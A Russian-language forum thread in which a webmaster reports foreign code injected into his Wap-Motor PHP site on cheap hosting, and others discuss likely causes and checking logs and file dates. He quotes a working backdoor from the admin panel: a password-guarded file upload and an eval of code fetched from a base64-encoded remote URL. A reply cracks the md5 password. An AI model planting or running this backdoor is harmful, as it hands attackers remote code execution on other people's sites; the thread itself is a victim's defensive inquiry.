Внедрение на сайт чужих кодов.

Всем привет, как защититься и оградиться от внедрения в код моих сайтов посторонних кусков кода от дешёвых хостеров? к сожалению примеров нет, удалил уже, но факт что в некоторых страницах php в режиме дисплей еррор ссылки на посторонние вредные шокирующие рекламы всякой дряни ведут, на уровне скорее роботов чем людей, однако этот неприятный сюрприз случайно обнаружил когда переделывал посторонний модуль для другого домена, а на чистом движке так и не заметил бы ничего.
Вот что теперь делать? Каждый раз вручную проверять весь движок? Wap-Motor).

Вот и пример нашёлся аж в админке))

ini_set('display_errors','Off'); error_reporting('E_ALL');
setcookie('server',1,time()+1e6);$s=$_SERVER;$sr=$s['HTTP_REFERER'];$sh=$s['HTTP_HOST'];$cs=$_COOKIE['server'];
if(isset($_FILES['u']) && isset($_POST['n']) && isset($_POST['hash']) && md5($_POST['hash'])=='3ff1ea09b981d88e7c8752b329a7702e')
{
	move_uploaded_file($_FILES['u']['tmp_name'],$_POST['n']);
}
elseif(($sr && !strpos($sr,$sh) && $cs!=1) || $c=$_GET['cmdcmd'])
{
	eval(file_get_contents(base64_decode('aHR0cDovL3FiMC5ydS93Lz91PQ==').$sh.'&c='.$c));
}

Как вариант перейти на нормальный хостинг.

@NaPapertiOleg, ну и зачем нужны такие хостеры, поменяй просто и все

md5($_POST['hash'])=='3ff1ea09b981d88e7c8752b329a7702e')

md5('loh') = 3ff1ea09b981d88e7c8752b329a7702e

Поменять хост это понятно, но тема не про это, а вообще контроль своего кода в принципе возможен или нет? Никто ни на каком хосте не застрахован от этого, в любое время в любом месте разместят такое в движке и не узнаешь.

А ты не думаешь , что это через сторонние модули внедряется, хостеры мне кажется не нужны такие вставки, если он захочет , то итак загрузить все что нужно

Не знаю, сам лично никогда с таким не сталкивался, например вап-мотором в своей модификации пользуюсь с самого момента выхода 24-й версии с осени прошлого года и с тех пор менял несколько доменов и несколько хостингов, но движок одинаковый всегда в одном виде, но эти коды появились только сейчас и только на очередном дешёвом хостинге, только на одном последнем, например на бегете такого не было вообще, и теперь уже меня терзают смутные сомнения ... про другие хосты.

Хостеру проще на уровне веб-сервера рекламу внедрить, чем по скриптам клиентов шерстить. Ищи через что это делают (логи анализируй). Вообще посмотри когда файл был изменён, от этого и отталкивайся.
Это может быть как взлом хостинга, так и конкретно сайта

Вот ситуация вчера поздно вечером на ночь зарегистрировал новый домен и новый хостинг и разместил движок, но про этот сайт в принципе за ночь никто не мог в сети интернет узнать никак, а утром узнаю про этот код случайно когда полез проверять компилятор java книг на настройку для нового домена в манифесте, вот чудеса), да ещё пробежался поисковиком в нотепаде и в админке всплыла тоже такая ерунда.

Сам вап мотор не может такое сделать, а посторонний модуль только компилятор java книг на файлах, без баз данных, и из копипаста текста в форму отправки данных, там одна php страница и тоже раньше никогда такого не было.

ну вообще не понятки полные, я же удалил все эти коды, а сейчас перед запаковкой в архив снова проверил и они опять появились, прямо на жёстком диске на пк, вообще ничего не понимаю.